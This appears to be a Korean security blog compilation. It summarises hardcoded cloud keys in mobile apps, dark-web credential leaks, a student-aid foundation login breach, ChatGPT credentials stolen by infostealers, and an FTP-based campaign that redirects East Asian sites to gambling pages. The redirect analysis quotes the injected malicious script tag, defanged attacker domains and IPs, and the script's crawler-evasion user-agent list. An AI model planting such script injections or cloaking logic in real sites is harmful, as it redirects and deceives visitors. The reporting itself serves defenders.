요약 - AWS, Azure의 인증 키들이 안드로이드와 iOS 앱들에서 발견
- 인증 정보를 코드 내에 하드코딩하고 암호화하지 않은 상태로 포함
내용 - AWS, Azure 등 클라우드 서비스의 인증 정보가 암호화 없이 하드코딩된 것으로 확인
> 앱의 바이너리 또는 소스 코드에 접근할 수 있는 누구나 자격 증명을 추출하여 데이터 조작 또는 유출할 수 있음을 의미

- 해당 앱들은 Google Play Stroe와 Apple App Store 등에서 수백만 번 다운로드됨
> Google Play Store : Pic Stitch, Meru Cabs, ReSound Tinnitus Relief 등
> Apple App Store : Crumbl, VideoShop 등

- 개발 단계에서의 잘못된 보안 관행이 주요 원인
> 개발자들이 편의상 자격 증명을 하드코딩하고 암호화 없이 남겨둔 채 배포된 것

- 권고 사항
> 환경변수 사용 : 민감한 자격 증명을 런타임에 로드되는 환경변수에 저장
> 비밀 관리 도구 사용 : AWS Secrets Manager나 Azure Key Vault와 같은 전용 비밀 관리 도구를 활용
> 민감 데이터 암호화 : 자격 증명을 앱에 저장해야 하는 경우 강력한 암호화 알고리즘 적용 및 런타임때 복호화
> 코드 리뷰 및 감사 : 정기적으로 코드 리뷰와 보안 감사를 수행해 하드코딩된 자격 증명과 기타 보안 취약점 식별 및 제거
> 보안 스캔 자동화 : 자동화된 보안 스캔 도구를 CI/CD에 통합하여 개발 프로세스 초기에 하드코딩된 자격 증명과 기타 보안 결함 감지
기타 - 22.09 보안 연구원은 AWS 자격 증명이 포함된 1,800개 이상의 iOS 및 Android 앱을 발견
> 이 중 77%가 코드베이스에 유효한 액세스 토큰

 

보안뉴스

 

유명 클라우드로의 크리덴셜, 각종 모바일 앱 통해 퍼진다

보안 외신 블리핑컴퓨터에 의하면 AWS와 애저(Azure)라는 거대 공공 클라우드의 인증 키들이 안드로이드와 iOS 앱들에서 발견되었다고 한다. 클라우드와 연계된 앱들을 만들고 제공하는 과정에서

www.boannews.com

 

수백만 사용하는 모바일 앱 보안 허점...AWS, Azure 인증 키 노출돼 - 데일리시큐

시만텍(Symantec) 최근 분석에 따르면, 수백만 명이 사용하는 인기 모바일 애플리케이션들이 아마존 웹 서비스(AWS)와 마이크로소프트 애저 블롭 스토리지(Microsoft Azure Blob Storage) 같은 클라우드 서

www.dailysecu.com

 

AWS, Azure auth keys found in Android and iOS apps used by millions

Multiple popular mobile applications for iOS and Android come with hardcoded, unencrypted credentials for cloud services like Amazon Web Services (AWS) and Microsoft Azure Blob Storage, exposing user data and source code to security breaches.

www.bleepingcomputer.com

 

Exposing the Danger Within: Hardcoded Cloud Credentials in Popular Mobile Apps

Examining the hidden risks posed to user privacy and security due to presence of hardcoded credentials within popular mobile apps.

www.security.com

 

'보안뉴스' 카테고리의 다른 글

“해커, 노출된 Git 설정 파일 통해 클라우드 계정 15,000개 탈취” 외 1건  (1) 2024.11.02
친러 성향 해커 ‘서버 킬러스’, 서울·인천 등 국내 CCTV 100대 이상 해킹 주장  (1) 2024.11.01
엔드포인트 탐지 기술을 회피하는 새로운 방법, 이디알사일런서 외 2건  (0) 2024.10.17
LLM 애플리케이션의 가장 치명적인 취약점 10가지와 최근 주목받는 RAG  (3) 2024.10.11
10년 넘은 리눅스 취약점 발견돼...세부 내용은 다음 주에 공개 외 1건  (1) 2024.09.29

1. SK바이오팜 내부 정보 유출

1. 개요

- 아키라(Akira) 랜섬웨어 그룹의 피해 기업에 SK라이프사이언스 등재

2. 주요내용

- 아키라 그룹은 딥웹에 SK라이프사이언스의 데이터 공개를 예고

- SK바이오팜 관계자는 랜섬웨어 공격을 받음을 인정 및 민감정보 유출은 없으며, 구체적인 사항은 비공개

 

2. RA 랜섬웨어 그룹에 의한 한국 기업의 정보 유출

1. 개요

- 바북(Babuk) 랜섬웨어의 소스코드를 이용해 미국과 한국의 기업들을 침해
- 주로 제조사, 자산 관리 업체, 보험사, 제약 회사 등에서 피해가 발견

2. 주요내용

- 한국 기업과 관련된 1.4TB 크기의 데이터 유출

- 피해자 데이터의 전체 파일 목록을 다운로드할 수 있는 URL을 제공

 

3. 챗GPT 크리덴셜 발견

1. 개요

- 약 10만 대의 장비에서 정보 탈취형 멀웨어들을 통해 챗GPT 계정 정보가 유출

2. 주요내용

- 22.06 ~ 23.05까지 다크웹에서 판매되는 정보들 중 챗GPT 크리덴셜 총 101,134개를 발견

 

4. 제로다크웹 다크웹 모니터링

1. 개요

- 국내 100대 기업 및 국내 30대 금융사 대상 다크웹 정보 유출 모의 조사 수행

2. 주요내용

- 국내 100대 기업 관련 내용

> 99개 사에서 유출된 계정은 총 105만 2,537개, 사내 문서 유출은 87개 회사, 해킹 우려 PC는 1만 5,028대 (81개 사) 등

> 23년 1월말 기준 일본 100대 기업의 경우와 비교 시 2배가 넘는 수치

 

- 국내 30대 금융사 관련 내용

> 메일 계정 유출 19만 6,395개, 사내 문서 유출 23개 금융사, PC 해킹 우려 18개 금융사 1,137대

> 23년 1월말 기준 일본 100대 기업의 경우와 비교 시 2배가 넘는 수치

3. 대응방안

- 즉시 보안 전문가 및 전문 회사를 통해 유출 경로 파악
- 유출된 정보를 보호하기 위해 비밀번호 변경 및 보안 인증 절차 강화
- 유출 경로 및 방법을 파악한 경우 관련 상세내용을 사내고지하고 사원 전원이 경계심을 갖도록 교육
- 자동 감사 솔루션을 사용하여 보안 문제 점검 및 감시
- 새로운 보안 절차 작성, 전사 취약성 확인, 지속적 모니터링 시스템의 도입 및 정기 유지보수 계획 검토

'개인정보보호(법) > DDW' 카테고리의 다른 글

DDW 동향  (1) 2024.02.08
DDW 동향  (0) 2023.12.13
DDW 동향  (0) 2023.07.31
DDW 동향  (0) 2023.05.11
DDW 동향  (0) 2023.04.03
침해 사고 정보
일자 2023/06/25
침해 정보 성명, 이메일, 주소, 휴대폰번호, 고객번호, 학자금 대출 신청현황, 학자금 대출 내역, 학자금 대출 잔액(등록금+생활비), 장학금 신청현황, 장학금 수혜내역, 장학 주요 공지, 대학생 연합생활관 신청현황, 대학생 연합생활관 입주내역, 나의기부
특징 사전 확보한 크리덴셜 정보를 통한 접근 시도
피해크기 확인불가
침해 사고 분석
경위 해외 IP에서 한국장학재단 홈페이지에 2차례 로그인 시도
> 1차_23.06.25 22:30 / 2차_23.06.26 07:30
> 사전 수집한 크리덴셜 정보를 이용해 접속한 것으로 추정
원인 ① 크리덴셜 정보 수집
> 이미 탈취된 정보 또는 동일한 계정 사용 등 공격자가 크리덴셜 정보를 사전에 수집한 것으로 판단됨
조치 ① 홈페이지 "개인정보 유출(의심)에 대한 안내 및 홈페이지 로그인 방식 변경 안내" 공지사항 게시
- 로그인 시도 포착 즉시 해외 IP 접근 차단
- 유출 의심 고객에게 MMS, 이메일을 이용해 안내
- 피해 최소화를 위해 ID/PW 로그인 방식에서 공동인증서를 이용한 로그인으로 로그인 방식 변경
- 재단 명의로 발송된 의심되는 URL 클릭 금지 및 보이스 피싱 유의 안내
- 피해 구제를 위한 안내 및 지원 약속
- 내부 개인정보 보호 관리체계를 개선
기타 ① 한국장학재단
- 교육부 산하 위탁집행형 준정부기관
- 대학생들의 학자금 지원 목적으로 2009년 설립
- 학자금 대출과 상환, 장학금 선정 및 수혜 등의 업무와 지도자 코멘티, 지식봉사활동 등을 수행

 

'침해사고 > 해킹사고' 카테고리의 다른 글

농협 전산망 마비 사태  (0) 2023.11.16
알라딘 전자책 유출 사건  (0) 2023.09.27
한국씨티은행 포스(POS)단말기 해킹 사고  (0) 2023.06.28
대학교 개인정보 유출  (0) 2023.06.17
한독 개인정보 유출  (0) 2023.06.16
요약 - 정보 탈취 멀웨어들이 챗GPT 크리덴셜을 탈취하여 다크웹에서 유포
- 약 10만 대의 장비에서 정보 탈취형 멀웨어들을 통해 챗GPT 계정 정보가 유출되었다는 조사 결과가 발표
내용 - 정보 탈취형 멀웨어
> 기기 정보, 쿠키, 브라우저 히스토리, 문건 등 거의 모든 유형의 정보를 훔치는 기능을 가짐
> 탈취 후 계정 엑세스, 다크웹 판매 등 2차 피해 발생

- 보안 업체 그룹IB(Group-IB) 조사
> 22.06 ~ 23.05까지 다크웹에서 판매되는 정보들 중 챗GPT 크리덴셜 총 101,134개를 발견
> 정보 탈취 멀웨어 별 분포
① 라쿤(Raccoon): 78,348개
② 비다(Vidar): 12,984개
③ 레드라인(Redline): 6,773개

> 지역 별 분포
① 인도 : 12,632개
② 파키스탄 : 9,217개
③ 브라질 : 6,531개
④ 베트남 : 4,771개
⑤ 이집트 : 4,558개

- 챗GPT가 최초 공개 되었을 때 다크웹에 등장한 챗GPT 크리덴셜은 2,766개
> 23.01 약 11,000개 이상
> 23.02 약 22,000개 이상
> 23.05 약 26,802개
> 챗GPT 크리덴셜에 대한 수요와 공급이 다크웹에서 꾸준히 높아지고 있다는 의미
기타 - 보안 업체 벌칸사이버(Vulcan Cyber)
> 챗GPT 크리덴셜이 아닌 정보 탈취형 멀웨어에 집중이 필요
> 탐지되지 않거나 이상 징후가 확인되지 않는 공격에 대해서는 무관심한 현상을 고쳐야함
> 정보 탈취형 멀웨어에 대한 탐지 능력이 좀 더 키워져야 함

- OpenAI
> 챗GPT의 문제가 아닌 사용자들의 장치에 존재하는 악성코드의 결과
> 현재 노출된 계정을 조사 중

- 주기적 비밀번호 변경, MFA 적용 등으로 계정 관리 필요

 

보안뉴스

 

어느 새 다크웹의 인기 아이템이 된 챗GPT 크리덴셜, 정보 탈취 멀웨어가 문제

다양한 정보 탈취형 멀웨어가 지난 한 해 동안 활발히 활동했고, 그 결과물들인 각종 정보들이 다크웹에 끊임없이 유통되고 있다. 그런데 어느 순간부터 그 정보들 속에 챗GPT 계정의 크리덴셜이

www.boannews.com

 

Over 100,000 Stolen ChatGPT Account Credentials Sold on Dark Web Marketplaces

Over 100,000 OpenAI ChatGPT account credentials have been compromised and sold on the dark web. Cybercriminals are targeting the valuable information.

thehackernews.com

'보안뉴스' 카테고리의 다른 글

USB 활용한 사이버 공격, 아직 알 수 없는 이유로 급증하고 있어  (0) 2023.07.19
개인정보·답안지 유출 등 말 많고 탈 많은 ‘4세대 나이스’... 교육계 일대 ‘혼란’  (0) 2023.06.27
MS, “6월초 있었던 아웃룩/클라우드 기능 장애는 사이버 공격에 의한 것” 외 3건  (0) 2023.06.19
제로데이 개념증명용 코드인 줄 알았는데 사실은 멀웨어 외 2건  (0) 2023.06.19
사상 첫 자동화 SaaS 랜섬웨어 공격을 성공시킨 오메가 일당들  (0) 2023.06.13

1. 개요

- 동아시아 사용자들이 주로 방문하는 웹사이트 수천 개가 침해

※ 최소 10,000개의 웹사이트를 손상시켰으며, 대부분은 중소기업이나 개인이 운영하는 사이트며, 대기업에서 운영하는 사이트도 일부 존재

- 이 사이트들에 접속하려 하면 방문자들은 해당 사이트가 아니라 성인 또는 도박 사이트로 리디렉션

- 2022.09부터 시작된 것으로 보이며, 공격자들은 FTP 크리덴셜을 활용

- 크리덴셜 정보를 탈취한 경로와 초기 웹 서버에 접속하는 방식 등 공격 백터를 특정하지 못했으나, 공격이 지속되어 공개

 

1.1 리다이렉션

- 리다이렉션: 이용자가 A가 웹 사이트 B에 접속 시 작업, 오류 등의 사유로 이용자 A를제 3의 사이트 C로 이동시키는 것

> 목적 사이트를 결정하기 위해 신뢰되지 않은 데이터를 사용하고, 이에 대한 적절한 검증이 없을 경우

> 공격자가 조작한 성인, 피싱, 악성 사이트 등으로 리다이렉트되는 취약점

[사진 1] 리다이렉션 취약점 요약

2. 분석

- 공격자들은 사이버 공격을 통해 취득된 정당한 FTP 자격 정보를 이용해 이용자들을 2022.09부터 성인 또는 도박 사이트로 리다이렉션

- 호스팅 업체와 웹사이트 구축에 사용된 기술의 차이로 공격자들이 어떤 식으로 침해하는지 밝혀내는 것이 어려웠음

 

- 침해된 웹 사이트의 경우 다음 2가지 공통점을 가짐

① 중국 또는 다른 곳에서 호스팅 되지만 중국 관객을 대상으로 서비스
② FTP 포트(21)가 열려 있는 서버 또는 다른 FTP 엔드포인트를 통해 접근

 

2.1 공격 방식

- 동아시아에서 호스트되고 있는 Azure Web Apps 중에 사용자를 성인용 웹사이트로 리디렉션하는 몇 가지 부정 액세스가 확인됨

- 브루트포스 등 취약한 계정을 사용한 FTP 서버에 접속해 웹 페이지 변경을 수행한 것으로 판단됨.

- 관련 FTP 로그를 분석해 본 결과, 172.81.104[.]64부터의 접근이 확인됨.

※ 중국 IP를 가진 허니팟을 구성한 결과, 해당 IP로 부터의 접근이 다수 확인

[사진 2] 공격 방식 요약

 

- 피해 웹사이트접속시 격에 호스팅 되어 있는 자바스크립트를 다운하는 HTML 코드가 한 줄씩 추가되어 있었음.

tpc[.]googlesyndication[.]com(페이지내 표시된 광고를 클릭했을 경우 발생되는 트래픽) 등 정규 서비스로 위장

※ 하위 도메인 com을 다른 도메인으로 변경

<script type="text/javascript" src="https://tpc.googlesyndication[.]wiki/sodar/sodar2.js"></script>

 

- 자바 스크립트의 경우 다음 2가지의 공통점을 가짐

① 자바스크립트 실행을 동아시아 특정 국가에서 접속한 사용자로 제한

② User-Agent와 Refferes를 참조 및 웹 크롤러 목록과 대조해 크롤러를 사용한 경우 해당 요청 무시

 

- 자바스크립트 유포 사이트는 정상 URL과 유사한 형태로 목록은 다음과 같음

※ 취소선이 표시된 경우 현재는 Offline

※ 정상 사이트와 비교 표

Malicious URL Legitimate URL
tpc.googlesyndication[.]wiki/sodar/sodar2.js tpc.googlesyndication[.]com/sodar/sodar2.js
beacon-v2.helpscout[.]help/static/js/vendor.06c7227b.js beacon-v2.helpscout[.]net/static/js/vendor.06c7227b.js
cdn.jsdelivr[.]autos/npm/jquery/dist/jquery.min.js cdn.jsdelivr[.]net/npm/jquery/dist/jquery.min.js
minjs[.]us/static/js/min.js */static/js/min[.]js
www.metamarket[.]quest/market.js www[.]metamarket[.]com
cdn-go[.]net/vasdev/web_webpersistance_v2/v1.8.2/flog.core.min.js cdn-go[.]cn/vasdev/web_webpersistance_v2/v1.8.2/flog.core.min.js
a.msstatic[.]net/main3/common/assets/template/head/ad.tmpl_a9b7.js a.msstatic[.]com/huya/main3/*

 

2.2 리다이렉션 스크립트

- 자바스크립트는 동작 조건는 다음과 같음

① 스크립트가 실행되면 0~1의 난수가 계산되며, 난수가 확률치보다 작은 경우 cookie를 설정한 후 srcAddress에 나열된 웹 사이트로 리다이렉션

※ 해당 cookie는 24시간 후 만료되도록 설정됨

 

② 이미 cookie가 설정된 사용자가 접근할 경우 즉시 srcAddress에 나열된 웹 사이트로 리다이렉션

 

③ 사용자가 모바일로 접속하고, 몇 가지 조건을 충족시키면 downloadSrc 필드에 나열된 리소스로 리디렉션되어 앱 다운

※ 조건 1: 안드로이드 브라우저(모바일용 웹 브라우저) 사용

※ 조건 2: config.androidApk 플래그가 스크립트로 활성화된 경우

 

④ User-Agent헤더 값을 알려진 웹 크롤러 목록과 비교하여 웹 크롤러인 경우 해당 요청 무시

※ User-Agent헤더 값이 알려진 웹 크롤러이며, Refferes헤더 값이 알려진 웹 브라우저일 경우 리다이렉션되지 않음

※ 스크립트에 표시된 크롤러 목록

bot|googlebot|crawler|spider|robot|crawling|Bytespider|Googlebot|Baiduspider|MSN Bot\/Bingbot|Yandex Bot|Soso Spider|Sosospider|Sogou Spider|360Spider|Yahoo! Slurp China|Yahoo!|YoudaoBot|YodaoBot|Sogou News Spider|msnbot|msnbot-media|bingbot|YisouSpider|ia_archiver|EasouSpider|JikeSpider|EtaoSpider|SemrushBot

[사진 3] 리다이렉션 스크립트의 결정 트리

2.3 중간 경유지

- 정상 URL과 유사한 형태로 목록은 다음과 같음

※ 리다이렉션은 직접 이루어졌으나, 현재는 중간 경유지를 통해 리다이렉션됨

Malicious URL Legitimate URL
s3a.pstatp[.]org/toutiao/push.js  s3a.pstatp[.]com/toutiao/push.js
stat.51sdk[.]org/ (e.g., stat.51sdk[.]org/b8nb3Ww5CtxpZis2)  stat.51sdk[.]com (?)
tpc.cdn-linkedin[.]info/js/vendor.5b3ca61.js  *-cdn.linkedin[.]com (e.g., mobile-cdn.linkedin.com)
widget-v4.tidiochat[.]net/1_131_0/static/js/chunk-WidgetIframe-.js  widget-v4.tidiochat[.]com/1_137_1/static/js/*

 

2.4 리다이렉션 사이트

- alibod1[.]com, 22332299[.]com, alibb1[.]xyz, alibb2[.]xyz이 있으며, 각종 도박 사이트 광고가 표시되고 팝업이 발생

 

3. 대응방안

① FTP(FTP 또는 SFTP)를 통해 웹사이트를 관리할 경우 강력한 사용자 이름과 패스워드 조합으로 사용할 것을 권장

 

② 계정 탈취 가능성이 존재하므로, 계정 변경

 

③ FTP를 사용해야하는 경우 FTPS 또는 SFTP로 전환

※ FTPS: 기존의 FTP에 전송 계층 보안(TLS)과 보안 소켓 계층(SSL) 암호화 프로토콜에 대한 지원이 추가된 것

※ SFTP: SSH File Transfer Protocol'의 약자로, 암호화를 통해 데이터를 안전하게 전송(일반 텍스트 파일은 전송되지 않음)

※ 차이점: FTPS는 인증서를 이용한 FTP+SSL 구성이며, SFTP는 SSH를 이용함

 

④ 최신 버전의 소프트웨어, 보안 프로그램등을 사용

 

⑤ 웹 소스 리뷰

 

⑥ 보안 장비 IoC 적용

 

4. 참고

[1] https://www.securityweek.com/thousands-of-websites-hijacked-using-compromised-ftp-credentials/
[2] https://www.wiz.io/blog/redirection-roulette
[3] https://www.boannews.com/media/view.asp?idx=114867&page=1&kind=1 

+ Recent posts

티스토리툴바